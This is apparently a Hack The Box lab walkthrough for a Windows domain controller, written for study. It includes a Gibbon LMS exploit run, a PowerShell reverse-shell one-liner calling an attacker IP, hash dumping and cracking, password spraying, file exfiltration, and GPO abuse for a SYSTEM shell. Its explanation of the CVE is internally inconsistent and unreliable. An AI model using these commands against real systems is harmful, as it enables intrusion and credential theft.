🪴 Quartz 4.0

TheFrizzler

Mar 12, 20268 min read

TheFrizzler - HTB Walkthrough & Advanced SecOps Notes

Target IP: 10.129.232.168 Domain: frizz.htb DC Hostname: frizzdc.frizz.htb OS: Windows Server 2022 (Domain Controller) Difficulty: Hard Author: [Your Name/Handle]

1. Phase 1: Reconnaissance & Information Gathering

1.1 TCP Port Discovery

We begin by identifying all open ports. Using --min-rate 10000 speeds up the scan significantly but can occasionally drop packets on unstable connections.

# -p-: Scan all ports (1-65535)
# --min-rate 10000: Set minimum packets per second to 10k for speed
# -oA nmap/FullPorts: Save results in all three major formats
nmap -p- --min-rate 10000 10.129.232.168 -oA nmap/FullPorts

Port Analysis & Attack Surface Mapping

  • 22/tcp (SSH): Running OpenSSH for_Windows_9.5. This is a prime target for later persistence once we have credentials.
  • 53/tcp (DNS): Simple DNS Plus. Standard on Windows AD environments.
  • 80/tcp (HTTP): Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12. Hosting Gibbon LMS.
  • 88/tcp (Kerberos): Used for ticket-based authentication. Essential for Kerberoasting or AS-REP roasting.
  • 135/tcp (MSRPC): Windows Remote Procedure Call. Useful for enumeration via rpcdump.
  • 389/tcp (LDAP): Active Directory directory services. Source for user/group enumeration.
  • 445/tcp (SMB): Microsoft-DS. Target for smbclient, crackmapexec, and potential relay attacks.
  • 593/tcp (RPC-over-HTTP): Used for management; often a vector for Bloodhound data collection.
  • 636/tcp (LDAPS): Secure LDAP.
  • 3268/3269 (Global Catalog): Extended LDAP for forest-wide searches.
  • 9389 (ADWS): Active Directory Web Services.

1.2 Targeted Service Scanning

With the ports identified, we run aggressive service detection.

# -A: OS detection, Version detection, Script scanning, and Traceroute
# -T5: Aggressive timing (safe for modern lab environments)
# -oA nmap/TheFrizz: Output results
nmap -A -T5 10.129.232.168 -oA nmap/TheFrizz

Critical Findings:

  1. HTTP Redirect: Port 80 redirects to http://frizzdc.frizz.htb/home/. This confirms the FQDN.
  2. DNS Name: The domain is explicitly identified as frizz.htb.
  3. Clock Skew: Nmap reports a skew of 6h59m59s. This is a Showstopper for Kerberos authentication (which allows max 5 mins deviation). We must fix this before using getTGT.py or ssh -K.

1.3 Local Host Resolution

Update your /etc/hosts file to ensure the web application and Kerberos tools can resolve the domain.

# Add this entry to /etc/hosts
10.129.232.168 frizzdc.frizz.htb frizz.htb

2. Phase 2: Vulnerability Analysis & Web Exploitation

2.1 Enumerating Gibbon LMS

Visiting the site reveals Gibbon LMS v25.0.00. Researching this version leads to CVE-2023-45878.

Vulnerability Detail:

  • CVE-2023-45878: This is an authenticated RCE. It allows an attacker to bypass file upload restrictions or exploit unsafe handling of PHP functions within the application’s administrative interface.
  • PoC Source: davidzzo23/CVE-2023-45878

2.2 Exploitation: Remote Code Execution

The exploit script requires a target URL and can execute commands directly.

# Clone the repository
git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878
 
# Test connectivity and execution
python CVE-2023-45878.py -t frizzdc.frizz.htb -c "whoami"
# Expected Output: nt authority\system (or the web service account, e.g., frizz\apache)

2.3 Upgrading to a Reverse Shell

Manual shells are more stable. We will use a PowerShell Base64 encoded payload to avoid character escaping issues.

Step 1: Create the Payload

Use a Nishang one-liner or a standard PowerShell TCP client.

# Simple PowerShell TCP One-Liner
$LHOST = "10.10.16.149"
$LPORT = "4444"
$code = '$client = New-Object System.Net.Sockets.TCPClient("' + $LHOST + '",' + $LPORT + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
 
# Convert to UTF-16LE and Base64 (The format Windows expects for -enc)
echo $code | iconv -t UTF-16LE | base64 -w0

Step 2: Catch and Execute

# Start Listener
rlwrap nc -lvnp 4444
 
# Execute Exploit
python CVE-2023-45878.py -t frizzdc.frizz.htb -c "powershell -enc [BASE64_BLOB]"

3. Phase 3: Post-Exploitation & Data Exfiltration

3.1 Database Credential Recovery

Web applications often store high-privilege database credentials in configuration files.

# Locate the configuration file
cd C:\xampp\htdocs\Gibbon-LMS\
type config.php

Captured Credentials:

  • $databaseUsername = 'MrGibbonsDB';
  • $databasePassword = 'MisterGibbs!Parrot!?1';

3.2 Dumping the MySQL Database

With direct access to the mysql binary, we can dump user hashes.

# Navigate to MySQL bin
cd C:\xampp\mysql\bin
 
# List tables to find the user table
.\mysql.exe -uMrGibbonsDB -p"MisterGibbs!Parrot!?1" gibbon -e "show tables"
 
# Dump user details
# Using \G ensures each row is printed vertically, preventing line wrapping in small shells.
.\mysql.exe -uMrGibbonsDB -p"MisterGibbs!Parrot!?1" gibbon -e "select username, passwordStrong, passwordStrongSalt from gibbonperson \G"

Extracted Hash (f.frizzle):

  • User: f.frizzle
  • Hash: 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03
  • Salt: /aACFhikmNopqrRTVz2489

3.3 Hash Cracking (Hashcat)

Gibbon LMS uses SHA256 with a specific salt.

# Format: hash:salt (Salted SHA256)
echo "067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489" > f_frizzle.hash
 
# Mode 1420: sha256($pass.$salt)
hashcat -m 1420 f_frizzle.hash /usr/share/wordlists/rockyou.txt

Cracked Password: Jenni_Luvs_Magic23

4. Phase 4: Lateral Movement

4.1 Syncing Time for Kerberos

As noted in the reconnaissance phase, we must sync our attack machine’s clock with the DC.

# Disable local NTP sync
sudo timedatectl set-ntp false
 
# Force sync with FrizzDC
sudo ntpdate -s frizzdc.frizz.htb
 
# Verify time
date

4.2 Attaining a Kerberos TGT

Using Impacket’s getTGT.py, we can request a Ticket Granting Ticket.

# Request TGT
getTGT.py frizz.htb/f.frizzle:Jenni_Luvs_Magic23
 
# Export the ccache file for use with other tools
export KRB5CCNAME=f.frizzle.ccache

4.3 SSH Access via Kerberos

We can now log in via SSH using the Kerberos ticket (GSSAPI).

# -K: Enables GSSAPI authentication
ssh -K f.frizzle@frizzdc.frizz.htb

5. Phase 5: Forensics & Further Enumeration

5.1 Recycle Bin Inspection

The Recycle Bin often contains deleted configuration files or installer logs. Each user has a unique folder based on their SID.

# List Recycle Bin contents
cd 'C:\$RECYCLE.BIN'
gci -force
 
# Access f.frizzle's recycle folder (Check SID via 'whoami /user')
cd 'S-1-5-21-2386970044-1145388522-2932701813-1103'
gci -force

Found: wapt.7z

5.2 Exfiltrating wapt.7z

If SCP is blocked, we can use the web server to download the file.

# Move file to Apache webroot
cp wapt.7z C:\xampp\htdocs\home\wapt.7z
# Download from Kali
wget http://frizzdc.frizz.htb/home/wapt.7z

5.3 Analyzing WAPT Configuration

WAPT (Windows APT-get) is a software management tool. Its configuration often contains administrative passwords.

# Extract the archive
7z x wapt.7z
 
# Inspect the ini file
cat conf/waptserver.ini | grep password
# Found: wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
 
# Decode Base64
echo "IXN1QmNpZ0BNZWhUZWQhUgo=" | base64 -d
# Password: !suBcig@MehTed!R

6. Phase 6: Domain Escalation via GPO Abuse

6.1 Password Spraying

We need to find who owns the !suBcig@MehTed!R password.

# 1. Enumerate all domain users
nxc smb frizzdc.frizz.htb -k -u f.frizzle -p Jenni_Luvs_Magic23 --users | awk '{print $5}' > users.txt
 
# 2. Spray the discovered password
nxc smb frizzdc.frizz.htb -u users.txt -p '!suBcig@MehTed!R' --continue-on-success

Match Found: M.SchoolBus

6.2 Bloodhound Analysis

Running Bloodhound.py or Rusthound as M.SchoolBus reveals a critical path:

  • M.SchoolBus is a member of Group Policy Creator Owners.
  • This group has the right to create new GPOs and link them to OUs where they have Write or AllExtendedRights.

6.3 GPO Creation & Linking

We will create a new GPO and link it to the Domain Controllers OU.

# Create the GPO
New-GPO -Name "MaliciousPolicy"
 
# Link it to the Domain Controllers OU
# This ensures it runs on the DC as SYSTEM
New-GPLink -Name "MaliciousPolicy" -Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB"

6.4 Injecting Malicious Tasks (SharpGPOAbuse)

SharpGPOAbuse.exe is a C# tool designed to modify GPOs to execute code.

# Host the tool on Kali
python3 -m http.server 80
# Download to Target
iwr http://10.10.16.149/SharpGPOAbuse.exe -OutFile Sharp.exe
 
# Add a scheduled task to the GPO
# --addcomputertask: Creates a task that runs as SYSTEM on the computer
# --TaskName: A benign-looking name
# --Command: Binary to run
# --Arguments: Our Base64 reverse shell payload
.\Sharp.exe --addcomputertask --GPOName "MaliciousPolicy" --Author "Administrator" --TaskName "SecurityUpdate" --Command "powershell.exe" --Arguments "-enc [BASE64_PAYLOAD]"

6.5 Forcing Policy Update

By default, GPOs update every 90 minutes. We can force it manually.

# Force update
gpupdate /force

7. Phase 7: Final Flag Recovery

7.1 Catching SYSTEM Shell

# Catch the incoming connection
rlwrap nc -lvnp 5555
# Verify Identity
whoami
# nt authority\system
 
# Locate Flags
type C:\Users\Administrator\Desktop\root.txt
type C:\Users\f.frizzle\Desktop\user.txt

7.2 Cleanup

To avoid leaving a mess in the production environment (the HTB machine), remove the malicious GPO.

Remove-GPO -Name "MaliciousPolicy"

Appendix: Common Troubleshooting

IssueResolution
Kerberos Error: KRB_AP_ERR_SKEWSync time using ntpdate against the DC.
PowerShell Shell DiesUse rlwrap and ensure no special characters are in the -enc blob.
SharpGPOAbuse FailsEnsure the GPO is actually linked to the correct OU.
SMB Login FailsCheck if SMB signing is required (Nmap output).

Deep Dive: How GPO Abuse Works

Group Policy Objects are stored in the SYSVOL share of the Domain Controller. When we use SharpGPOAbuse, it modifies the GptTmpl.inf (for user rights) or ScheduledTasks.xml (for tasks) inside the GPO folder.

  1. Modification: The tool writes to \\frizz.htb\SYSVOL\frizz.htb\Policies\{GPO_GUID}\....
  2. Notification: The DC detects a change in the GPO version number.
  3. Application: The gpupdate process on the target machine pulls the new XML/INF file and executes the defined task.

Deep Dive: Gibbon LMS RCE (CVE-2023-45878)

The vulnerability lies in the System Settings module where an administrator can define paths or system commands. By manipulating the input in the System Check or External Tools configuration, an attacker can escape the intended command and inject arbitrary PHP. The PoC automates the login and the injection of a PHP web shell into a reachable directory.

Deep Dive: WAPT Forensics

WAPT is a “Windows APT-get” equivalent. It uses a local service to manage packages.

  • wapt-get.ini: Contains the global configuration.
  • waptserver.ini: Contains the server-side credentials if the machine acts as a repository or management node.
  • Key Security Flaw: Passwords in early versions were often stored in plaintext or simple Base64 within these configuration files to allow the service to authenticate to the central repository.

Graph View

Backlinks

  • No backlinks found